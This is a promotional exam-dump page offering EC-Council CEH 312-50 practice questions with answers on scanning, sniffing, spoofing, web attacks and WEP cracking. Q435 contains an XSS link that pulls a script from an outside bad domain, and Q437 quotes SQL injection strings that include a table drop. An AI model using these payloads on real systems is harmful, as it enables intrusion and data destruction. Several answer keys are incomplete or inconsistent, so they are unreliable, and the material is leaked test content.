10 Tips For 312-50 IT professionals

we provide Validated EC-Council 312-50 download which are the best for clearing 312-50 test, and to get certified by EC-Council Ethical Hacking and Countermeasures (CEHv6). The 312-50 Questions & Answers covers all the knowledge points of the real 312-50 exam. Crack your EC-Council 312-50 Exam with latest dumps, guaranteed!

2017 NEW RECOMMEND

Free VCE & PDF File for EC-Council 312-50 Real Exam
(Full Version!)

Pass on Your First TRY 100% Money Back Guarantee Realistic Practice Exam Questions

Free Instant Download NEW 312-50 Exam Dumps (PDF & VCE):
Available on:
http://www.certleader.com/312-50-dumps.html

Q431. While doing fast scan using –F option, which file is used to list the range of ports to scan by nmap? 

A. services 

B. nmap-services 

C. protocols 

D. ports 

Answer: B

Explanation: Nmap uses the nmap-services file to provide additional port detail for almost every scanning method. Every time a port is referenced, it's compared to an available description in this support file. If the nmap-services file isn't available, nmap reverts to the /etc/services file applicable for the current operating system. 

Q432. WinDump is a popular sniffer which results from the porting to Windows of TcpDump for Linux. What library does it use ? 

A. LibPcap 

B. WinPcap 

C. Wincap 

D. None of the above 

Answer: B

Explanation: WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture. 

Q433. Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security-related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position. 

Harold is currently trying to run a Sniffer on the agency’s network to get an idea of what kind of traffic is being passed around but the program he is using does not seem to be capturing anything. He pours through the sniffer’s manual but can’t find anything that directly relates to his problem. Harold decides to ask the network administrator if the has any thoughts on the problem. Harold is told that the sniffer was not working because the agency’s network is a switched network, which can’t be sniffed by some programs without some tweaking. 

What technique could Harold use to sniff agency’s switched network? 

A. ARP spoof the default gateway 

B. Conduct MiTM against the switch 

C. Launch smurf attack against the switch 

D. Flood switch with ICMP packets 

Answer: A

Explanation: ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack). 

Q434. The follows is an email header. What address is that of the true originator of the message? 

Return-Path: <bgates@microsoft.com> 

Received: from smtp.com (fw.emumail.com [215.52.220.122]. 

by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807 

for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500 

Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 

Received: from ([19.25.19.10]. 

by smtp.com with SMTP 

Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. 

by localhost with SMTP; 8 Aug 2003 23:25:01 -0000 

From: "Bill Gates" <bgates@microsoft.com> 

To: "mikeg" <mikeg@thesolutionfirm.com> 

Subject: We need your help! 

Date: Fri, 8 Aug 2003 19:12:28 -0400 

Message-ID: <51.32.123.21@CHRISLAPTOP> 

MIME-Version: 1.0 

Content-Type: multipart/mixed; 

boundary="—-=_NextPart_000_0052_01C35DE1.03202950" 

X-Priority: 3 (Normal. 

X-MSMail-Priority: Normal 

X-Mailer: Microsoft Outlook, Build 10.0.2627 

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 

Importance: Normal 

A. 19.25.19.10 

B. 51.32.123.21 

C. 168.150.84.123 

D. 215.52.220.122 

E. 8.10.2/8.10.2 

Answer: C

Explanation: Spoofing can be easily achieved by manipulating the "from" name field, however, it is much more difficult to hide the true source address. The "received from" IP address 

168.150.84.123 is the true source of the 

Q435. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. 

<ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js %22%3E%3C/script%3E">See foobar</a> 

What is this attack? 

A. Cross-site-scripting attack 

B. SQL Injection 

C. URL Traversal attack 

D. Buffer Overflow attack 

Answer: A

Q436. Which of the following is NOT true of cryptography? 

A. Science of protecting information by encoding it into an unreadable format 

B. Method of storing and transmitting data in a form that only those it is intended for can read and process 

C. Most (if not all) algorithms can be broken by both technical and non-technical means 

D. An effective way of protecting sensitive information in storage but not in transit 

Answer:

Explanation: Cryptography will protect data in both storage and in transit. 

Q437. Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser. 

John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet enabled banking application. Strangely, the account balances of many bank’s customers has been changed! 

However, money hadn’t been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application’s logs and found the following entries: 

Attempted login of unknown user: John Attempted login of unknown user: sysaR Attempted login of unknown user: sencat Attempted login of unknown user: pete ‘’; Attempted login of unknown user: ‘ or 1=1–Attempted login of unknown user: ‘; drop table logins–Login of user jason, sessionID= 0x75627578626F6F6B Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x90627579944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64 Transfer Funds user jason Pay Bill user mike Logout of user mike 

What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer) 

A. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID. 

B. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason’s session. 

C. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools. 

D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability. 

Answer: A

Explanation: The following part: Attempted login of unknown user: pete ‘’; Attempted login of unknown user: ‘ or 1=1–Attempted login of unknown user: ‘; drop table logins–Clearly shows a hacker trying to perform a SQL injection by bypassing the login with the statement 1=1 and then dumping the logins table. 

Q438. Why do you need to capture five to ten million packets in order to crack WEP with AirSnort? 

A. All IVs are vulnerable to attack 

B. Air Snort uses a cache of packets 

C. Air Snort implements the FMS attack and only encrypted packets are counted 

D. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers 

Answer: C

Explanation: Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community — who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think. 

Q439. A remote user tries to login to a secure network using Telnet, but accidently types in an invalid user name or password. Which responses would NOT be preferred by an experienced Security Manager? (multiple answer) 

A. Invalid Username 

B. Invalid Password 

C. Authentication Failure 

D. Login Attempt Failed 

E. Access Denied 

Answer: AB

Explanation: As little information as possible should be given about a failed login attempt. Invalid username or password is not desirable. 

Q440. Which of the following is the primary objective of a rootkit? 

A. It opens a port to provide an unauthorized service 

B. It creates a buffer overflow 

C. It replaces legitimate programs 

D. It provides an undocumented opening in a program 

Answer: C

Explanation: Actually the objective of the rootkit is more to hide the fact that a system has been compromised and the normal way to do this is by exchanging, for example, ls to a version that doesn’t show the files and process implanted by the attacker. 

Certleader Dumps
Certleader is a company specialized on providing high quality IT exam materials and fully committed to assist our respected clients crack any IT certification tests on their 1st efforts.